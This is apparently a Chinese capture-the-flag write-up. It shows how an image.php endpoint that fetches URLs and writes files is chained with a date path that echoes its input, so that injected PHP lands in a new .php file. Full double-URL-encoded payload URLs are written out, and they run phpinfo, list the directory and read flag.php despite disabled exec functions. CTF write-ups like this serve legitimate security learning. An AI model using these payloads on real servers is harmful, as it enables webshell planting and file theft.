前三次都忘了報名了,第四次那個csrf那個題當時已經想對了,也繞過了,但是最後迫於信安技術作業和ppt的壓力結果最後沒有做完,也是蠻遺憾的。
這次終於有機會在補seccon的空隙把這一期的題做了。不過這一期的題目相對來說要比前幾期簡單些。
首先看看網站。在首頁的源碼裏面有這樣一部分很奇怪
<script src="http://54.223.231.220/image.php?file=http://127.0.0.1:8888/test.png&path=logo.jpg"></script>
訪問下,說是logo.jpg更新成功。
試了幾下,發現以下幾點
首先這個鏈接是訪問
file指向的鏈接,並將返回的內容寫到path指向的文件file指向的連接必須是127.0.0.1的,不太好繞過path可以是.php後綴的文件,但是過濾的尖括號,沒有辦法二次訪問直接webshell。
綜上思路就是想辦法在本站下找一個地方可以寫webshell的,然後通過這個image.php直接寫webshell。
但是剛纔說了沒有辦法二次訪問image.php直接寫webshell。
所以還要另外找地方。
然後發現這個地方http://54.223.231.220/?date/2016-07/,
日期被直接打印出來了,那麼我們試試,果然這裏可以打印鏈接上的內容,所以構造poc如下:(注意要二次url編碼)
http://54.223.231.220/image.php?file=http%3A%2f%2f127.0.0.1%3A8888%2f%3Fdate%2f2016-07%253C%253Fphp%2520%2520phpinfo%2528%2529%253B%2520%253F%253E%2f&path=bendawang.php
訪問http://54.223.231.220/bendawang.php,截圖如下:
成功了,那麼看看被禁用的函數:
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,fopen,fread,fwrite,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen,assert
幾乎所有執行命令的函數都被禁用了。
那麼先用glob遍歷下目錄把
http://54.223.231.220/image.php?file=http%3A%2f%2f127.0.0.1%3A8888%2f%3Fdate%2f2016-07%253C%253Fphp%2520%2520foreach%2528glob%2528%2522.%252f%252a%2522%2529%2520as%2520%2524bdw%2529%257B%2520%2520echo%2520%2524bdw.%2522%253Cbr%253E%2522%253B%2520%257D%253F%253E%2f&path=bendawang.php
訪問截圖如下:
發現一個flag.php,直接讀取內容看看,poc如下:
http://54.223.231.220/image.php?file=http%3A%2f%2f127.0.0.1%3A8888%2f%3Fdate%2f2016-07%253C%253Fphp%2520%2520echo%2520file_get_contents%2528%2527flag.php%2527%2529%253B%253F%253E%2f&path=bendawang.php
截圖如下,拿到flag
